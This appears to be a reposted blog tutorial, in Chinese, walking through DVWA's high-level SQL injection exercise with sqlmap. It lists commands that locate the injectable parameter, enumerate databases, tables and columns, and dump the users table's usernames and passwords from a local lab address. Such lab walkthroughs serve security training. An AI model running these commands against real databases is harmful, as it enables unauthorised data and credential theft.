DVWA 之high级别sql注入

本文转载自查看原文 2019-07-13 01:48 1101 mysql

Sqlmap 高级注入，抓包，然后保存数据到1.txt

1.判断注入点

sqlmap -r /root/1.txt -p id  --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/"  --level  2  #level是注入的等级，默认是1

2.爆数据库

sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --dbs

3.爆表

sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --tables -D "dvwa"

4. 爆字段

sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --columns -D "dvwa" -T "users"

5.爆帐号密码

sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --dump -D "dvwa" -T "users" -C "user,password"

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 dvwa中med级别和high级别的sql注入 DVWA 之medium级别sql注入 DVWA-SQL注入-low，medium，high DVWA全级别之SQL Injection（SQL注入） DVWA-7.3 SQL Injection（SQL注入）-High DVWA之SQL 注入(盲注)全级别 DVWA-SQL注入 DVWA-SQL注入 DVWA-SQL注入 DVWA 之 sql注入+ sqlmap